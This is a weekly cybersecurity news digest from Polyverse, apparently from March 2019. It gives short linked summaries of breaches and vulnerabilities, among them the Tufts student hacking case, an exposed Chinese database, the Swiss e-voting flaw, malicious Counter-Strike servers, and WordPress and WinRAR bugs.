Polyverse Weekly Breach Report

breach_report

A snapshot of last week’s reported cybersecurity breaches and vulnerabilities

Tufts University
Tufts University expelled a student after she was accused of stealing and using university logins to break into the student records system. The one problem is that in every instance that the school accused her of hacking she has proof of her whereabouts and eyewitness accounts that she was not with the laptop she’s been accused of using. Two remote access trojans were found on her computer, which suggests that someone had remote control of her computer without her knowledge. To read more: https://techcrunch.com/2019/03/08/tufts-grade-hacking

Chinese “breedready” database
A security researcher discovered an open Chinese database that contains personal information for more than 1.8m women. The information includes phone numbers, addresses, and “breedready” status. The youngest girl in the database is 15 years old. To read more: https://www.theguardian.com/world/2019/mar/11/china-database-lists-breedready-status-of-18-million-women

Windows 10
Microsoft added a safety measure to Windows 10 that automatically uninstalls buggy software patches if it detects a startup failure. If this happens, the patch will be reinstalled in 30 days, presumably, when it is no longer crashing the machine. To read more: https://thehackernews.com/2019/03/windows-buggy-updates.html

Russia vs. ProtonMail
The Russian government has told internet providers to block encrypted email provider ProtonMail. The block was ordered by the state Federal Security Service, formerly known as the KGB, which accused the company of facilitating bomb threats. To read more: https://techcrunch.com/2019/03/11/russia-blocks-protonmail/

Swiss internet voting system
A group of researchers found a critical flaw that could allow someone to alter votes in the new internet voting system Switzerland plans to roll out. The backdoor exists in a part of the system that is supposed to verify the ballots and votes counted in an election are the same ones the voters cast. The researchers encouraged the Swiss government to immediately halt the system’s rollout. To read more: https://motherboard.vice.com/en_us/article/zmakk3/researchers-find-critical-backdoor-in-swiss-online-voting-system

IBM facial recognition
IBM released a collection of a million photos that were taken from the photo hosting site Flickr as a step towards reducing bias in facial recognition. Some of the photographers whose images were included in the dataset were concerned that their photos could be used for surveillance. IBM assured Flickr users that they can opt out of the database, but the company has not publicly shared the list of Flickr users and photos included in the dataset. To read more: https://www.nbcnews.com/tech/internet/facial-recognition-s-dirty-little-secret-millions-online-photos-scraped-n981921

Counter-Strike
39% of all existing Counter-Strike 1.6 game servers available online are malicious and set up to hack gamers’ computers remotely. A team of researchers disclosed that an attacker was silently compromising computers worldwide by exploiting a zero-day in the game client. The game contains unpatched remote code execution vulnerabilities that enable attackers to execute code as soon as the computer connects to a malicious server. To read more: https://thehackernews.com/2019/03/counter-strike-game-servers.html

The Committee for Public Counsel Services
A cyberattack on The Committee for Public Counsel Services has caused a slowdown, delaying some hearings and disabled email systems. The Committee is the agency that oversees public defenders. The attackers used ransomware to lock up the servers, which the agency refused to pay because it had backup files to restore the system. However, the attack still caused delays in the court system. To read more: https://www.bostonglobe.com/business/2019/03/12/cyberattack-with-ransom-demand-has-disrupted-public-defenders-for-weeks/6TkoNMGrHbnzT7tsMI2xoO/story.html

US Navy
An internal review conducted by the US Navy found that the Navy and its various industry partners are under cyber attack by Chinese hackers. To read more: https://www.militaryaerospace.com/articles/pt/2019/03/cyber-attack-navy-chinese-hackers.html

Kathmandu
An outdoor clothing and equipment retailer called Kathmandu is investigating a security incident in its online trading websites. An unidentified third-party gained access to the website platform from January 8th to February 12th. To read more: https://www.reseller.co.nz/article/658766/kathmandu-investigates-suspected-data-breach/

Buying zero-days
A journalist from Motherboard got an in-depth look at a company attempting to buy a zero-day exploit. While at Offensive Con he tweeted that if anyone wanted to talk about buying or selling zero days to text him on the encrypted messaging app Signal. A representative from a company called Haboob reached out. To read more: https://motherboard.vice.com/en_us/article/xwbk5j/saudi-cybersecurity-company-tried-buy-zero-days-from-me-haboob-darkmatter

Privacy as a luxury
Vice reports on the effects of data breaches on lower-income individuals and how the stakes are much higher than average. To read more: https://www.vice.com/en_us/article/mbz493/privacy-is-becoming-a-luxury-what-data-leaks-are-like-for-the-poor

Equifax Canada
Equifax Canada is urging Canadians to do more to protect their data. Equifax, a company that is under investigation by the United States Congress for having inadequate security, is concerned that Canadians are not doing enough to stay secure. To read more: https://securitytoday.com/articles/2019/03/15/equifax-tells-canadians-to-do-more-to-protect-their-data.aspx

Gearbest
Gearbest is an e-commerce portal for Chinese goods. It is used to purchase and import Android smartphones from China into countries where they are not officially sold by the OEM. White hat hackers found that several different parts of Gearbest’s database were insecure and more than 1.5m records were exposed. The hackers attempted to contact Gearbest to inform them of the breach but received no response. To read more: https://www.xda-developers.com/gearbest-database-security-breach-accounts-addresses-orders-payment-unsecured/

Check out Have I Been Pwnedto see if any of your accounts have been exposed by the above breaches.

Reported Vulnerabilities

Mobile phishing campaign
A cybersecurity researcher shared details of a new mobile phishing campaign. The attack mimics the look and feel of a browser window to trick people into giving their login credentials to attackers. To see the attack in action and read more: https://thehackernews.com/2019/03/ios-mobile-phishing-attack.html

SimBad malware
Up to 150m users might have downloaded the SimBad Android malware onto their phones. SimBad is malicious adware that was found mainly in racing and shooter game apps. To read more: https://www.zdnet.com/article/almost-150-million-users-impacted-by-new-simbad-android-adware/

Microsoft Patch Tuesday
Microsoft released its March 2019 software updated to address 64 CVE security vulnerabilities. These vulnerabilities include two zero-days that are actively being exploited in the wild. To read more: https://thehackernews.com/2019/03/microsoft-windows-security-updates.html

Android Antivirus apps
An Austrian antivirus lab tested 250 antivirus apps found in the Google Play Store against 2,000 malware samples. The researchers found that only 80 of the apps could stop a small amount of malware. Most of the apps appear to have been created to display ads or promote a developer’s career. To read more: https://www.tomsguide.com/us/android-av-apps-bogus,news-29621.html

Adobe
Adobe released patches for two security vulnerabilities in their March Security Update. The bugs are critical code execution vulnerabilities in Photoshop and Digital Editions. Adobe found no evidence of the exploits being used in the wild. To read more: https://thehackernews.com/2019/03/adobe-software-updates.html

Fujitsu wireless keyboard

A German pen-testing company found that Fujitsu LX wireless keyboards are vulnerable to keystroke injections. The vulnerability enables a hacker to beam wireless radio signals to the keyboards USB dongle. The vulnerability is because of weak cryptography in the USB receiver, not the keyboard itself. To read more: https://www.zdnet.com/article/fujitsu-wireless-keyboard-model-vulnerable-to-keystroke-injection-attacks/

WordPress
A new flaw was discovered in WordPress that could potentially enable remote code execution attacks. The flaw is a cross-site request forgery issue in the comment section, which comes enabled by default and affects all WordPress versions before 5.1.1. To read more: https://thehackernews.com/2019/03/hack-wordpress-websites.html

WinRAR
Hackers are still exploiting a recently patched vulnerability in WinRAR, a popular Windows file compression application. WinRAR software does not have an auto-update feature which leaves its users vulnerable. To read more: https://thehackernews.com/2019/03/winrar-hacking-malware.html

Want to learn more?

Sign up below and receive these reports and more, directly in your inbox.

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.